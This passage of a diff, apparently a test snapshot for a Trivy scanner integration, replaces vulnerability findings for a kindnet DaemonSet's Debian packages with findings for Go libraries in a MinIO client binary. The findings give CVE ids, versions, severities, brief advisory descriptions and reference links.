arbitrary domains can be impersonated.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "GNU libidn2 before 2.2.0 fails to perform the roundtrip checks specifi ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-12290", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00008.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00009.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12290", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", }, { "type": "URL", - "value": "https://gitlab.com/libidn/libidn2/commit/241e8f486134793cb0f4a5b0e5817a97883401f5", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", }, { "type": "URL", - "value": "https://gitlab.com/libidn/libidn2/commit/614117ef6e4c60e1950d742e3edf0a0ef8d389de", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", }, { "type": "URL", - "value": "https://gitlab.com/libidn/libidn2/merge_requests/71", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UFT76Y7OSGPZV3EBEHD6ISVUM3DLARM/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXDKYWFV6N2HHVSE67FFDM7G3FEL2ZNE/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ONG3GJRRJO35COPGVJXXSZLU4J5Y42AT/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RSI4TI2JTQWQ3YEUX5X36GTVGKO4QKZ5/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U6ZXL2RDNQRAHCMKWPOMJFKYJ344X4HL/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202003-63", + "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4168-1", + "value": "https://errata.rockylinux.org/RLSA-2022:7129", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4168-1/", + "value": "https://github.com/advisories/GHSA-69cg-p879-7622", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "libip4tc2", - "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", - ], - }, - "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "iptables: --syn flag bypass", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", + "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", }, { "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", + "value": "https://github.com/golang/go/issues/54658", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://go.dev/cl/428735", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://go.dev/issue/54658", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://groups.google.com/g/golang-announce", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-11360", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "libip4tc2", - "references": [ - "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", - "https://access.redhat.com/security/cve/CVE-2019-11360", - "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", - "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", - "https://www.cve.org/CVERecord?id=CVE-2019-11360", - ], - }, - "category": "Vulnerability", - "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "iptables: buffer overflow in iptables-restore", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-11360", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", }, { "type": "URL", - "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-11360", + "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", }, { "type": "URL", - "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "libip6tc2", - "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", - ], - }, - "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "iptables: --syn flag bypass", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", }, { "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "value": "https://pkg.go.dev/vuln/GO-2022-0969", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", + "value": "https://security.gentoo.org/glsa/202209-26", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-11360", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "libip6tc2", + "fixedVersion": "0.1.1-0.20221104162952-702349b0e862", + "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41721", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", + "packageName": "golang.org/x/net", "references": [ - "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", - "https://access.redhat.com/security/cve/CVE-2019-11360", - "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", - "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", - "https://www.cve.org/CVERecord?id=CVE-2019-11360", + "https://access.redhat.com/security/cve/CVE-2022-41721", + "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", + "https://go.dev/cl/447396", + "https://go.dev/issue/56352", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", + "https://pkg.go.dev/vuln/GO-2023-1495", + "https://www.cve.org/CVERecord?id=CVE-2022-41721", ], }, "category": "Vulnerability", - "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "iptables: buffer overflow in iptables-restore", + "name": "request smuggling", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-11360", + "value": "https://avd.aquasec.com/nvd/cve-2022-41721", }, { "type": "URL", - "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "value": "https://access.redhat.com/security/cve/CVE-2022-41721", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-11360", + "value": "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", }, { "type": "URL", - "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "value": "https://go.dev/cl/447396", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "value": "https://go.dev/issue/56352", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2023-1495", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41721", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.8.3-1+deb10u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3520", - "installedVersion": "1.8.3-1", - "packageName": "liblz4-1", + "fixedVersion": "0.7.0", + "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41723", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-3520", - "https://bugzilla.redhat.com/show_bug.cgi?id=1954559", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3520", - "https://errata.almalinux.org/8/ALSA-2021-2575.html", - "https://errata.rockylinux.org/RLSA-2021:2575", - "https://github.com/lz4/lz4/pull/972", - "https://linux.oracle.com/cve/CVE-2021-3520.html", - "https://linux.oracle.com/errata/ELSA-2021-2575.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3520", - "https://security.netapp.com/advisory/ntap-20211104-0005/", - "https://ubuntu.com/security/notices/USN-4968-1", - "https://ubuntu.com/security/notices/USN-4968-2", - "https://www.cve.org/CVERecord?id=CVE-2021-3520", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://access.redhat.com/security/cve/CVE-2022-41723", + "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "https://go.dev/cl/468135", + "https://go.dev/cl/468295", + "https://go.dev/issue/57855", + "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "https://pkg.go.dev/vuln/GO-2023-1571", + "https://vuln.go.dev/ID/GO-2023-1571.json", + "https://www.cve.org/CVERecord?id=CVE-2022-41723", ], }, "category": "Vulnerability", - "description": "There's a flaw in lz4. An attacker who submits a crafted file to an application linked with lz4 may be able to trigger an integer overflow, leading to calling of memmove() on a negative size argument, causing an out-of-bounds write and/or a crash. The greatest impact of this flaw is to availability, with some potential impact to confidentiality and integrity as well.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "memory corruption due to an integer overflow bug caused by memmove argument", + "name": "avoid quadratic complexity in HPACK decoding", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3520", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3520", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1954559", + "value": "https://avd.aquasec.com/nvd/cve-2022-41723", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3520", + "value": "https://access.redhat.com/security/cve/CVE-2022-41723", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-2575.html", + "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:2575", + "value": "https://go.dev/cl/468135", }, { "type": "URL", - "value": "https://github.com/lz4/lz4/pull/972", + "value": "https://go.dev/cl/468295", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3520.html", + "value": "https://go.dev/issue/57855", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-2575.html", + "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3520", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211104-0005/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4968-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4968-2", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3520", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://pkg.go.dev/vuln/GO-2023-1571", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://vuln.go.dev/ID/GO-2023-1571.json", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-17543", - "installedVersion": "1.8.3-1", - "packageName": "liblz4-1", + "fixedVersion": "0.4.0", + "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41717", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", + "packageName": "golang.org/x/net", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00069.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00070.html", - "https://access.redhat.com/security/cve/CVE-2019-17543", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15941", - "https://github.com/lz4/lz4/compare/v1.9.1...v1.9.2", - "https://github.com/lz4/lz4/issues/801", - "https://github.com/lz4/lz4/pull/756", - "https://github.com/lz4/lz4/pull/760", - "https://lists.apache.org/thread.html/25015588b770d67470b7ba7ea49a305d6735dd7f00eabe7d50ec1e17@%3Cissues.arrow.apache.org%3E", - "https://lists.apache.org/thread.html/543302d55e2d2da4311994e9b0debdc676bf3fd05e1a2be3407aa2d6@%3Cissues.arrow.apache.org%3E", - "https://lists.apache.org/thread.html/793012683dc0fa6819b7c2560e6cf990811014c40c7d75412099c357@%3Cissues.arrow.apache.org%3E", - "https://lists.apache.org/thread.html/9ff0606d16be2ab6a81619e1c9e23c3e251756638e36272c8c8b7fa3@%3Cissues.arrow.apache.org%3E", - "https://lists.apache.org/thread.html/f0038c4fab2ee25aee849ebeff6b33b3aa89e07ccfb06b5c87b36316@%3Cissues.arrow.apache.org%3E", - "https://lists.apache.org/thread.html/f506bc371d4a068d5d84d7361293568f61167d3a1c3e91f0def2d7d3@%3Cdev.arrow.apache.org%3E", - "https://lists.apache.org/thread.html/r0fb226357e7988a241b06b93bab065bcea2eb38658b382e485960e26@%3Cissues.kudu.apache.org%3E", - "https://lists.apache.org/thread.html/r4068ba81066792f2b4d208b39c4c4713c5d4c79bd8cb6c1904af5720@%3Cissues.kudu.apache.org%3E", - "https://lists.apache.org/thread.html/r7bc72200f94298bc9a0e35637f388deb53467ca4b2e2ad1ff66d8960@%3Cissues.kudu.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2019-17543", - "https://security.netapp.com/advisory/ntap-20210723-0001/", - "https://www.cve.org/CVERecord?id=CVE-2019-17543", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuoct2020.html", + "https://access.redhat.com/errata/RHSA-2023:2367", + "https://access.redhat.com/security/cve/CVE-2022-41717", + "https://bugzilla.redhat.com/2092793", + "https://bugzilla.redhat.com/2161274", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "https://go.dev/cl/455635", + "https://go.dev/cl/455717", + "https://go.dev/issue/56350", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-41717.html", + "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "https://pkg.go.dev/vuln/GO-2022-1144", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-41717", ], }, "category": "Vulnerability", - "description": "LZ4 before 1.9.2 has a heap-based buffer overflow in LZ4_write32 (related to LZ4_compress_destSize), affecting applications that call LZ4_compress_fast with a large input. (This issue can also lead to data corruption.) NOTE: the vendor states "only a few specific / uncommon usages of the API are at risk."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "lz4: heap-based buffer overflow in LZ4_write32", + "name": "excessive memory growth in a Go server accepting HTTP/2 requests", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-17543", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00069.html", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00070.html", + "value": "https://avd.aquasec.com/nvd/cve-2022-41717", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-17543", + "value": "https://access.redhat.com/errata/RHSA-2023:2367", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15941", + "value": "https://access.redhat.com/security/cve/CVE-2022-41717", }, { "type": "URL", - "value": "https://github.com/lz4/lz4/compare/v1.9.1...v1.9.2", + "value": "https://bugzilla.redhat.com/2092793", }, { "type": "URL", - "value": "https://github.com/lz4/lz4/issues/801", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://github.com/lz4/lz4/pull/756", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", }, { "type": "URL", - "value": "https://github.com/lz4/lz4/pull/760", + "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/25015588b770d67470b7ba7ea49a305d6735dd7f00eabe7d50ec1e17@%3Cissues.arrow.apache.org%3E", + "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/543302d55e2d2da4311994e9b0debdc676bf3fd05e1a2be3407aa2d6@%3Cissues.arrow.apache.org%3E", + "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/793012683dc0fa6819b7c2560e6cf990811014c40c7d75412099c357@%3Cissues.arrow.apache.org%3E", + "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/9ff0606d16be2ab6a81619e1c9e23c3e251756638e36272c8c8b7fa3@%3Cissues.arrow.apache.org%3E", + "value": "https://go.dev/cl/455635", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/f0038c4fab2ee25aee849ebeff6b33b3aa89e07ccfb06b5c87b36316@%3Cissues.arrow.apache.org%3E", + "value": "https://go.dev/cl/455717", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/f506bc371d4a068d5d84d7361293568f61167d3a1c3e91f0def2d7d3@%3Cdev.arrow.apache.org%3E", + "value": "https://go.dev/issue/56350", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r0fb226357e7988a241b06b93bab065bcea2eb38658b382e485960e26@%3Cissues.kudu.apache.org%3E", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r4068ba81066792f2b4d208b39c4c4713c5d4c79bd8cb6c1904af5720@%3Cissues.kudu.apache.org%3E", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r7bc72200f94298bc9a0e35637f388deb53467ca4b2e2ad1ff66d8960@%3Cissues.kudu.apache.org%3E", + "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-17543", + "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210723-0001/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-17543", + "value": "https://pkg.go.dev/vuln/GO-2022-1144", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2020.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "5.2.4-1+deb10u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1271", - "installedVersion": "5.2.4-1", - "packageName": "liblzma5", + "fixedVersion": "0.3.8", + "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-32149", + "installedVersion": "v0.3.7", + "packageName": "golang.org/x/text", "references": [ - "https://access.redhat.com/errata/RHSA-2022:4940", - "https://access.redhat.com/security/cve/CVE-2022-1271", - "https://bugzilla.redhat.com/2073310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", - "https://errata.almalinux.org/9/ALSA-2022-4940.html", - "https://errata.rockylinux.org/RLSA-2022:4940", - "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", - "https://linux.oracle.com/cve/CVE-2022-1271.html", - "https://linux.oracle.com/errata/ELSA-2022-5052.html", - "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", - "https://security-tracker.debian.org/tracker/CVE-2022-1271", - "https://security.gentoo.org/glsa/202209-01", - "https://security.netapp.com/advisory/ntap-20220930-0006/", - "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", - "https://ubuntu.com/security/notices/USN-5378-1", - "https://ubuntu.com/security/notices/USN-5378-2", - "https://ubuntu.com/security/notices/USN-5378-3", - "https://ubuntu.com/security/notices/USN-5378-4", - "https://www.cve.org/CVERecord?id=CVE-2022-1271", - "https://www.openwall.com/lists/oss-security/2022/04/07/8", + "https://access.redhat.com/security/cve/CVE-2022-32149", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "https://github.com/golang/go/issues/56152", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "https://go.dev/cl/442235", + "https://go.dev/issue/56152", + "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "https://pkg.go.dev/vuln/GO-2022-1059", + 